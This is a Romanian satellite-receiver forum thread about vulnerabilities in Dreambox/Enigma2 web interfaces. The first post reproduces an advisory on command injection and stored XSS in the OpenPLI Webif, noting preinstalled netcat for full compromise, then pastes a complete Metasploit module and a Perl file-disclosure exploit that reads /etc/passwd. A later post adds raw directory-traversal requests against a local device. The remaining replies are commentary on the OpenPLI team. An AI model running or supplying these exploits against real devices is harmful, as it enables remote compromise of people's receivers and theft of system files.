Thanks Thanks:  2
Likes Likes:  1
Dislikes Dislikes:  0
Results 1 to 6 of 6

Thread: Pareri .... ? Dreambox Security / Bugs .... ??? Discutii .... ????

  1. #1
    Standard RSP member
    Join Date
    13 Feb 2007
    Location
    Earth
    Posts
    1,977
    Mentioned
    0 Post(s)
    Rep Power
    76

    Default Pareri .... ? Dreambox Security / Bugs .... ??? Discutii .... ????

    ###############################Device Name: OpenPLI - Dream Multimedia Box with OpenPLI softwareVendor of device: Dream MultimediaVendor of Software: OpenPLI Community============ Device Details: ============ Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011Firmware release 1.1.0, 27.01.2013FP Firmware 1.06Web Interface 6.0.4-Expert - PLi edition by [lite]More infos: http://openpli.org/============ Vulnerability Overview: ============ * OS Command Execution: parameter: maxmtuThe vulnerability is caused by missing input validation in the maxmtu parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to use Netcat to fully compromise the device.http://target-ip/cgi-bin/setConfigSe...2Flib%2FsqliteIt is possible to shorten the URL to the following:http://target-ip/cgi-bin/setConfigSe...=%26COMMAND%26There is Netcat preinstalled on the device. It is a very small edition of netcat, so you have to play a bit with it but you will get it * stored XSS:Box Control -> Configuration -> Webserver -> User, Password parameter: AuthUser, AuthPasswordBox Control -> Configuration -> Settings parameter: audiochannelspriorityInjecting scripts into the parameter audiochannelspriority reveals that this parameter is not properly validated for malicious input.============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael MessnerMail: devnull#at#s3cur1ty#dot#deWeb: http://www.s3cur1ty.de/advisoriesTwitter: @s3cur1ty_de#####################





    ### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'OpenPLI Webif Arbitrary Command Execution', 'Description' => %q{ Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS command injection in the Webif 6.0.4 Web Interface. This is a blind injection, which means that you will not see any output of your command. A ping command can be used for testing the vulnerability. This module has been tested in a box with the next features: Linux Kernel version 2.6.9 (build@plibouwserver) (gcc version 3.4.4) #1 Wed Aug 17 23:54:07 CEST 2011, Firmware release 1.1.0 (27.01.2013), FP Firmware 1.06 and Web Interface 6.0.4-Expert (PLi edition). }, 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '90230' ], [ 'BID', '57943' ], [ 'EDB', '24498' ], [ 'URL', 'http://openpli.org/wiki/Webif' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ] ], 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat generic' } }, 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 08 2013' )) end def exploit print_status("#{rhost}:#{rport} - Sending remote command...") vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") begin send_request_cgi( { 'uri' => normalize_uri("cgi-bin", "setConfigSettings"), 'method' => 'GET', 'vars_get' => { "maxmtu" => "1500&#{payload.encoded}&" } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT fail_with(Msf::Exploit::Failure::Unreachable, "#{rhost}:#{rport} - HTTP Connection Failed, Aborting") end endend


    #!/usr/bin/perl## Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit### Author: Todor Donev# Email me: todor.donev@@gmail.com# Platform: Linux# Type: remote### Gewgle Dork: "Enigma2 movielist" filetype:rss#### Enigma2 is a framebuffer-based zapping application (GUI) for linux.# It's targeted to real set-top-boxes, but would also work on regular PCs.# Enigma2 is based on the Python programming language with a backend# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.## Enigma2 can also be controlled via an Enigma2:WebInterface.### Thanks to Tsvetelina Emirska !!##use LWP::Simple;$t = $ARGV[0];if(! $t) {usg();}$d = $ARGV[1];if(! $d) {$d = "/etc/passwd";}my $r = get("http://$t/web/about") or exit;print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";print "[+] Target: $t\n";if ($r =~ m/<e2webifversion>(.*)<\/e2webifversion>/g){print "[+] Image Version: $1\n";}if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";result(exploit1());}if ($r =~ (m/1.5rc1|1.5beta4/i)){print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";result(exploit2());}sub usg{print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";print "[+] Usage: perl enigma2.pl <victim> </path/file>\n";exit;}sub exploit1{my $x = get("http://$t/file?file=$d");}sub exploit2{my $x = get("http://$t/file/?file=../../../..$d");}sub result{my $x= shift;while(defined $x){print "$x\n";print "[+] I got it 4 cheap.. =)\n";exit;}}
    Don't dream your life - live your DREAMbox ! DON'T FORGET TO SAY '' THANKS '' Note: Viewing Pay TV without a valid subscription is illegal All the files available here are kept for experimental and educational purpose only!

  2. #2

    Join Date
    14 Feb 2007
    Posts
    1,089
    Mentioned
    0 Post(s)
    Rep Power
    0

    Default

    Asta este palma pe obrazul PLI, ca tot se lauda teamul ca ei fac totul din pasiune in timpul liber.. insa producatorii receptoarelor trebuie sa-i sprijine ca ei sa scoata imagini. Ori e pasiune, ori e "fara serie"... ar fi interesant sa vedem ce explicatii le da PLI celor ce le finanteaza timpul liber

  3. #3
    Standard RSP member
    Join Date
    07 Sep 2013
    Location
    https://t.me/blackhatshiller
    Posts
    377
    Mentioned
    2 Post(s)
    Rep Power
    44

    Default

    2 noi
    ###########################################################
    - search GET Code Execution High
    ###########################################################
    + search GET Directory Traversal High


    GET http://192.168.88.251/web/epgsearch..../etc/passwd%00 HTTP/1.1
    Host: 192.168.88.251
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Cookie: %7B%22style%22%3A%22dark%22%2C%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A3 00000%7D=



    GET http://192.168.88.251/web/epgsearch..../../etc/passwd HTTP/1.1
    Host: 192.168.88.251
    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Cookie: %7B%22style%22%3A%22dark%22%2C%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A3 00000%7D=


    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Date: Mon, 13 Jan 2014 09:59:59 GMT
    Content-Type: application/xhtml+xml; charset=UTF-8
    Server: TwistedWeb/12.0.0

  4. #4
    Old Member mondo's Avatar
    Join Date
    31 Jan 2007
    Location
    Romania
    Posts
    2,428
    Mentioned
    38 Post(s)
    Rep Power
    87

    Default

    Asta se intimpla cind e opensource! Se ajuta unii pe alti!

  5. #5
    Expert Gigablue & Mut@tant 4k laleauaneagra's Avatar
    Join Date
    01 Feb 2007
    Posts
    5,000
    Mentioned
    0 Post(s)
    Rep Power
    104

    Default

    daca alte team uri nu mai sant in stare de nimic,asta e...tot rahatu se invarte in juru openpli,pacat ,rusine si ce o mai fi
    HD51: 4K - KODI - HBBTV - IPTV STALKER
    TOP5: Zgemma H9,
    Mut@nt/AX HD51 4K, Axas E4HD, Bre2ze4K, VU+ Ultimo 4K

  6. #6
    Standard RSP member
    Join Date
    07 Sep 2013
    Location
    https://t.me/blackhatshiller
    Posts
    377
    Mentioned
    2 Post(s)
    Rep Power
    44

    Default

    Am uitat sa spun ca in postul de mai sus e vb de teste facute pe dm-ul de acasa cu ultima imagine newnigma...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •